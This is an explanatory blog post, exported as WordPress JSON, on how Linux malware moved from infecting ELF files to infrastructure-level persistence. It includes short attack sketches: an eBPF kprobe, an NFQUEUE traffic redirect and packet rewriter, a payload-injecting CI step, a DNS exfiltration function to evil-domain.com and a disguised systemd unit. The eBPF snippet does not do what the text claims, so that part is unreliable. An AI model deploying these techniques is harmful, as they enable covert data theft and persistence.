{"id":781,"date":"2026-06-02T00:36:52","date_gmt":"2026-06-02T00:36:52","guid":{"rendered":"https:\/\/quantusintel.group\/osint\/blog\/2026\/06\/02\/the-evolution-of-malware\/"},"modified":"2026-06-02T00:36:52","modified_gmt":"2026-06-02T00:36:52","slug":"the-evolution-of-malware","status":"publish","type":"post","link":"https:\/\/quantusintel.group\/osint\/blog\/2026\/06\/02\/the-evolution-of-malware\/","title":{"rendered":"The Evolution of Malware"},"content":{"rendered":"
\"\"<\/figure>\n

The first viruses targeting ELF files (the primary format for executable files under UNIX) were first detected in the late 1990s, and their population now numbers in the hundreds.<\/p>\n

By default, UNIX prohibits the modification of executable files, and successful virus propagation is only possible at the root level, which is either assigned to the infected file by an administrator or seized by the virus itself through vulnerabilities in the system kernel. With the right access control policy and prompt application of patches, the threat of viral infection is minimized. And the days of widespread software sharing are long gone\u200a\u2014\u200ano one copies binaries from each other anymore, downloading everything directly from the internet. Even if a virus manages to infect the main server, it won\u2019t go beyond the first generation.<\/p>\n

File viruses are no longer relevant, and the absence of major outbreaks confirms this. But the accumulated methods of infiltration haven\u2019t gone anywhere\u200a\u2014\u200awithout them, the lifespan of Trojans and remote administration systems would be short. Gaining root access is just the beginning. A hacker needs to establish a foothold in the system, clinging to anything that moves, but even then they cannot be sure that a backup won\u2019t bury their\u00a0efforts.<\/p>\n

It is believed that viruses that infiltrate source code are more resilient. In reality\u200a\u2014\u200athey are not. Source code is needed by only a few, and programmers have long been using version control systems. Attempts to infect Linux and Apache source code fail spectacularly.<\/p>\n

The same applies to viruses in interpreted scripts\u200a\u2014\u200abash, Python, PHP, and others. Scripts are ubiquitous in UNIX; modifying them is allowed, but no one shares them. Therefore, viruses remain inside the infected computer, unable to\u00a0escape.<\/p>\n

Of course, a virus can spread over the Internet, but then it is no longer a virus, but a worm\u200a\u2014\u200aand that is a different story.<\/p>\n

WHERE DID THE VIRUSES\u00a0GO?<\/em><\/strong><\/p>\n

And this is where things get really interesting. While classic ELF viruses are dying out like mammoths, their concepts live on in far more sophisticated forms. A modern attacker won\u2019t tamper with the\u00a0.text segment of a binary; instead, they\u2019ll embed themselves in the system so that while you\u2019re watching the processes, they\u2019ll be watching you right\u00a0back.<\/p>\n

Whereas viruses used to latch onto files, they now latch onto system behavior. For example, via eBPF\u200a\u2014\u200athat very \u201csecure\u201d mechanism that kernel marketers tout as a miracle. But give the attacker root access\u200a\u2014\u200aand they turn eBPF into the perfect post-exploitation tool: intercepting syscalls, hiding network activity, filtering logs on the\u00a0fly.<\/p>\n

And the funniest part is\u200a\u2014\u200aall of this happens not somewhere in the underground, but using the very same mechanisms that developers use for monitoring and debugging. In other words, the attacker doesn\u2019t just infiltrate the system\u200a\u2014\u200athey do it using the system\u2019s own tools. They don\u2019t break the rules of the game; they play by them, just a bit more aggressively and cleverly. And when you open `bpftool prog show`, you see exactly what they want you to see. Everything else quietly lives in the shadows of the\u00a0kernel.<\/p>\n

At the same time, viruses have ceased to be something that \u201csticks\u201d to a binary; they have become something that grows into the infrastructure. They embed themselves in network stacks, in pipelines, in CI\/CD, in containers, in service\u00a0meshes.<\/p>\n

A modern virus leaves no traces on the disk; it leaves traces in behavior: strange timings, unexpected system calls, anomalous DNS requests, processes that \u201csleep\u201d too long, and containers that \u201cdie\u201d too\u00a0quickly.<\/p>\n

And the worst part is\u200a\u2014\u200athe virus doesn\u2019t have to be monolithic. It can be distributed, like a cloud. One component sits in eBPF, another in NFQUEUE, a third in CI\/CD, and a fourth in the Kubernetes admission controller. Kill one\u200a\u2014\u200athe rest keep on living. This is no longer a virus in the classical sense. It\u2019s an ecosystem that uses your infrastructure as its own organism.<\/p>\n

HOW IT LOOKS IN\u00a0REALITY:<\/em><\/strong><\/p>\n

To understand just how far modern malware has come, you only need to look at what it looks like in the code. Not in theory, but in reality\u200a\u2014\u200ain the form of small snippets that seem almost innocent but do things that would have left old ELF viruses speechless.<\/p>\n

eBPF: Something in the Kernel
<\/strong>This snippet doesn\u2019t break the system, doesn\u2019t rewrite binaries, and leaves no traces. It simply sits in a kprobe and pretends it isn\u2019t there. But at the same time, it neatly cuts out of the logs everything the attacker doesn\u2019t\u00a0like.<\/p>\n

SEC(\"kprobe\/tcp_connect\")
int hide_connect(struct pt_regs *ctx) {
    struct sock *sk = (struct sock *)PT_REGS_PARM1(ctx);
    u16 dport = BPF_CORE_READ(sk, __sk_common.skc_dport);

    if (dport == bpf_htons(443)) {
        return 0;
    }

    return 1;
}<\/pre>\n
NFQUEUE: A Network\u00a0Editor<\/strong><\/p>\n
Just one line of iptables\u200a\u2014\u200aand all outgoing HTTP traffic ends up in the hands of an attacker:<\/p>\n
iptables -I OUTPUT -p tcp --dport 80 -j NFQUEUE --queue-num 666<\/pre>\n
And next up is a Python script that replaces the contents of packages on the\u00a0fly:<\/p>\n
from netfilterqueue import NetfilterQueue
from scapy.all import *

def modify(pkt):
    sc = IP(pkt.get_payload())
    if sc.haslayer(HTTP):
        sc[HTTP].User_Agent = \"Mozilla\/5.0 (Totally Legit)\"
        del sc[IP].chksum
        del sc[TCP].chksum
        pkt.set_payload(bytes(sc))
    pkt.accept()

nfq = NetfilterQueue()
nfq.bind(666, modify)
nfq.run()<\/pre>\n
CI\/CD: A Threat in the Supply\u00a0Chain<\/strong><\/p>\n
Here\u2019s what happens when an attacker gains access to your pipeline:<\/p>\n
steps:
  - name: Build
    run: |
      gcc app.c -o app

  - name: Inject payload
    run: |
      echo \"malicious payload\" >> app

  - name: Upload artifact
    uses: actions\/upload-artifact@v3
    with:
      name: app
      path: .\/app<\/pre>\n
The victim downloads the \u201cvirus\u201d themselves. It\u2019s not a malicious file\u200a\u2014\u200ait\u2019s a malicious process.<\/p>\n
DNS tunnel:<\/strong><\/p>\n
import dns.resolver
import base64

def exfil(data):
    chunk = base64.b64encode(data.encode()).decode()
    domain = f\"{chunk}.evil-domain.com\"
    try:
        dns.resolver.resolve(domain, \"A\")
    except:
        pass

exfil(\"secret_token=12345\")<\/pre>\n
The antivirus detects a DNS request. Zeek detects an anomaly. And the attacker sees a communication channel.<\/p>\n
systemd<\/strong>:<\/p>\n
[Unit]
Description=systemd-tmpfiles-clean
After=network.target

[Service]
Type=simple
ExecStart=\/usr\/local\/bin\/.hidden_service
Restart=always

[Install]
WantedBy=multi-user.target<\/pre>\n
This is not a virus. It is a stable, persistent component that is integrated into the system and continues to function regardless of system restarts or standard maintenance procedures.<\/p>\n
File viruses are dead.But their spirit lives on more vividly than anything\u00a0else.<\/p>\n
It has simply moved\u00a0on:<\/p>\n
\u2014 from ELF to\u00a0eBPF,<\/p>\n
\u2014 from binaries to pipelines,<\/p>\n
\u2014 from disk to\u00a0network,<\/p>\n
\u2014 from the file system to behavior,<\/p>\n
\u2014 from local machines to the\u00a0cloud.<\/p>\n
A modern virus is not a\u00a0file.<\/p>\n
It is a system\u00a0state.<\/p>\n
And you don\u2019t fight it with antivirus software, but with monitoring, telemetry, behavioral analysis, supply chain control, and paranoia elevated to the level of engineering art. Because viruses haven\u2019t disappeared. They\u2019ve simply stopped being\u00a0files.<\/p>\n
\"\"<\/p>\n
\n
The Evolution of Malware<\/a> was originally published in OSINT Team<\/a> on Medium, where people are continuing the conversation by highlighting and responding to this story.<\/p>","protected":false},"excerpt":{"rendered":"
The first viruses targeting ELF files (the primary format for executable files under UNIX) were first detected in the late 1990s, and their population now numbers in the hundreds. By default, UNIX prohibits the modification of executable files, and successful virus propagation is only possible at the root level, which is either assigned to the … Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":782,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-781","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/781","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/comments?post=781"}],"version-history":[{"count":0,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/781\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media\/782"}],"wp:attachment":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media?parent=781"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/categories?post=781"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/tags?post=781"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}